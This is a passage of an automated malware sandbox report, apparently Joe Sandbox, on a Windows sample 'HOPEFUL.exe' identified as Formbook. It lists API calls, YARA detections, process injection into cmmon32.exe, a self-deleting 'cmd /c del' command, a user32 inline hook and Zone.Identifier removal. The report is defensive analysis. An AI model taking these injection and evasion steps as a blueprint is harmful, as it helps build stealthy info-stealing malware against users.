Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0185A710 NtOpenProcessToken, 5_2_0185A710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859730 NtQueryVirtualMemory, 5_2_01859730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859760 NtOpenProcess, 5_2_01859760
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859770 NtSetInformationFile, 5_2_01859770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0185A770 NtOpenThread, 5_2_0185A770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859A80 NtOpenDirectoryObject, 5_2_01859A80
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018596D0 NtCreateKey, 5_2_018596D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859610 NtEnumerateValueKey, 5_2_01859610
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859A10 NtQuerySection, 5_2_01859A10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859650 NtQueryValueKey, 5_2_01859650
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01859670 NtQueryInformationProcess, 5_2_01859670
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29860 NtQuerySystemInformation,LdrInitializeThunk, 19_2_04E29860
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29840 NtDelayExecution,LdrInitializeThunk, 19_2_04E29840
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E295D0 NtClose,LdrInitializeThunk, 19_2_04E295D0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E299A0 NtCreateSection,LdrInitializeThunk, 19_2_04E299A0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29540 NtReadFile,LdrInitializeThunk, 19_2_04E29540
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29910 NtAdjustPrivilegesToken,LdrInitializeThunk, 19_2_04E29910
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E296E0 NtFreeVirtualMemory,LdrInitializeThunk, 19_2_04E296E0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E296D0 NtCreateKey,LdrInitializeThunk, 19_2_04E296D0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29660 NtAllocateVirtualMemory,LdrInitializeThunk, 19_2_04E29660
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29650 NtQueryValueKey,LdrInitializeThunk, 19_2_04E29650
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29A50 NtCreateFile,LdrInitializeThunk, 19_2_04E29A50
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29FE0 NtCreateMutant,LdrInitializeThunk, 19_2_04E29FE0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29780 NtMapViewOfSection,LdrInitializeThunk, 19_2_04E29780
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29710 NtQueryInformationToken,LdrInitializeThunk, 19_2_04E29710
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E298F0 NtReadVirtualMemory, 19_2_04E298F0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E298A0 NtWriteVirtualMemory, 19_2_04E298A0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E2B040 NtSuspendThread, 19_2_04E2B040
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29820 NtEnumerateKey, 19_2_04E29820
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E295F0 NtQueryInformationFile, 19_2_04E295F0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E299D0 NtCreateProcessEx, 19_2_04E299D0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29560 NtWriteFile, 19_2_04E29560
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29950 NtQueueApcThread, 19_2_04E29950
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29520 NtWaitForSingleObject, 19_2_04E29520
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E2AD30 NtSetContextThread, 19_2_04E2AD30
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29A80 NtOpenDirectoryObject, 19_2_04E29A80
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29670 NtQueryInformationProcess, 19_2_04E29670
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29A20 NtResumeThread, 19_2_04E29A20
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29A00 NtProtectVirtualMemory, 19_2_04E29A00
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29610 NtEnumerateValueKey, 19_2_04E29610
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29A10 NtQuerySection, 19_2_04E29A10
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E297A0 NtUnmapViewOfSection, 19_2_04E297A0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E2A3B0 NtGetContextThread, 19_2_04E2A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29760 NtOpenProcess, 19_2_04E29760
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29770 NtSetInformationFile, 19_2_04E29770
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E2A770 NtOpenThread, 19_2_04E2A770
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29730 NtQueryVirtualMemory, 19_2_04E29730
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E29B00 NtSetValueKey, 19_2_04E29B00
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E2A710 NtOpenProcessToken, 19_2_04E2A710
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00ED9D60 NtCreateFile, 19_2_00ED9D60
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00ED9E90 NtClose, 19_2_00ED9E90
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00ED9E10 NtReadFile, 19_2_00ED9E10
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00ED9F40 NtAllocateVirtualMemory, 19_2_00ED9F40
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00ED9D5D NtCreateFile, 19_2_00ED9D5D
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00ED9E8A NtClose, 19_2_00ED9E8A
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00ED9E0B NtReadFile, 19_2_00ED9E0B
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00ED9F3A NtAllocateVirtualMemory, 19_2_00ED9F3A
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_02F1359C CreateProcessAsUserW, 0_2_02F1359C
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_02F11898, 0_2_02F11898
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_02F11168, 0_2_02F11168
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_02F048A2, 0_2_02F048A2
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_02F063AB, 0_2_02F063AB
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_02F12E78, 0_2_02F12E78
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_02F12A00, 0_2_02F12A00
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_016499C1, 0_2_016499C1
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_0164BBE8, 0_2_0164BBE8
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_0164A4B9, 0_2_0164A4B9
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_01643F90, 0_2_01643F90
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_0164F618, 0_2_0164F618
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_0164EE1A, 0_2_0164EE1A
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_0164D6AA, 0_2_0164D6AA
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_016476B0, 0_2_016476B0
Source: C:\Users\user\Desktop\HOPEFUL.exe, Code function: 0_2_0164F608, 0_2_0164F608
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00401030, 5_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0041D8D2, 5_2_0041D8D2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0041E197, 5_2_0041E197
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0041D313, 5_2_0041D313
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00402D87, 5_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00402D90, 5_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00409E40, 5_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0041D63C, 5_2_0041D63C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00409E3F, 5_2_00409E3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0041DF97, 5_2_0041DF97
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0041DFAA, 5_2_0041DFAA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00402FB0, 5_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_00DE2050, 5_2_00DE2050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01842581, 5_2_01842581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018E25DD, 5_2_018E25DD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0182D5E0, 5_2_0182D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0181F900, 5_2_0181F900
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018E2D07, 5_2_018E2D07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01810D20, 5_2_01810D20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01834120, 5_2_01834120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018E1D55, 5_2_018E1D55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0182B090, 5_2_0182B090
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018420A0, 5_2_018420A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018E20A8, 5_2_018E20A8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018E28EC, 5_2_018E28EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018D1002, 5_2_018D1002
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0182841F, 5_2_0182841F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_0184EBB0, 5_2_0184EBB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018DDBD2, 5_2_018DDBD2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018E1FF1, 5_2_018E1FF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018E2B28, 5_2_018E2B28
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018E22AE, 5_2_018E22AE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_018E2EF7, 5_2_018E2EF7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 5_2_01836E30, 5_2_01836E30
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E120A0, 19_2_04E120A0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04DFB090, 19_2_04DFB090
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04DF841F, 19_2_04DF841F
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04EA1002, 19_2_04EA1002
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04DFD5E0, 19_2_04DFD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E12581, 19_2_04E12581
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04EB1D55, 19_2_04EB1D55
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E04120, 19_2_04E04120
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04DEF900, 19_2_04DEF900
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04DE0D20, 19_2_04DE0D20
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E06E30, 19_2_04E06E30
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_04E1EBB0, 19_2_04E1EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00EDE197, 19_2_00EDE197
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00EC2D87, 19_2_00EC2D87
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00EC2D90, 19_2_00EC2D90
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00EC9E40, 19_2_00EC9E40
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00EC9E3F, 19_2_00EC9E3F
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00EDDFAA, 19_2_00EDDFAA
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00EC2FB0, 19_2_00EC2FB0
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 19_2_00EDDF97, 19_2_00EDDF97
          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: String function: 0181B150 appears 35 times
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04DEB150 appears 32 times
          Source: HOPEFUL.exe Binary or memory string: OriginalFilename vs HOPEFUL.exe
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSHCore1.dll0 vs HOPEFUL.exe
          Source: HOPEFUL.exe, 00000000.00000002.296333169.0000000003121000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPe6.dll" vs HOPEFUL.exe
          Source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAddInProcess32.exeT vs HOPEFUL.exe
          Source: HOPEFUL.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@4/3
          Source: C:\Users\user\Desktop\HOPEFUL.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HOPEFUL.exe.log
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01
          Source: C:\Users\user\Desktop\HOPEFUL.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: HOPEFUL.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HOPEFUL.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\HOPEFUL.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: HOPEFUL.exe ReversingLabs: Detection: 31%
          Source: unknown Process created: C:\Users\user\Desktop\HOPEFUL.exe 'C:\Users\user\Desktop\HOPEFUL.exe'
          Source: unknown Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknown Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HOPEFUL.exe Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\HOPEFUL.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: HOPEFUL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HOPEFUL.exe Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: HOPEFUL.exe Static file information: File size 3437056 > 1048576
          Source: HOPEFUL.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x346600
          Source: HOPEFUL.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: cmmon32.pdb source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, cmmon32.exe, 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmmon32.exe
          Source: Binary string: AddInProcess32.pdbpw source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, 00000005.00000002.341420581.0000000000DE2000.00000002.00020000.sdmp, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\HOPEFUL.exe Code function: 0_2_02F005E6 pushfd ; iretd 0_2_02F00613
          Source: C:\Users\user\Desktop\HOPEFUL.exe Code function: 0_2_02F04E9A push es; iretd 0_2_02F05094
          Source: C:\Users\user\Desktop\HOPEFUL.exe Code function: 0_2_02F04B71 push es; iretd 0_2_02F05094
          Source: C:\Users\user\Desktop\HOPEFUL.exe Code function: 0_2_02F00A2A push ds; ret 0_2_02F00A51
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0041CEB5 push eax; ret 5_2_0041CF08
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0041CF6C push eax; ret 5_2_0041CF72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0041CF02 push eax; ret 5_2_0041CF08
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0041CF0B push eax; ret 5_2_0041CF72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0186D0D1 push ecx; ret 5_2_0186D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_04E3D0D1 push ecx; ret 19_2_04E3D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_00EDD856 push esi; ret 19_2_00EDD859
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_00EDCEB5 push eax; ret 19_2_00EDCF08
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_00EDCF6C push eax; ret 19_2_00EDCF72
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_00EDCF0B push eax; ret 19_2_00EDCF72
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_00EDCF02 push eax; ret 19_2_00EDCF08
          Source: C:\Users\user\Desktop\HOPEFUL.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\HOPEFUL.exe File opened: C:\Users\user\Desktop\HOPEFUL.exe\:Zone.Identifier read attributes | delete
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE0
          Source: C:\Users\user\Desktop\HOPEFUL.exe Process information set: NOOPENFILEERRORBOX
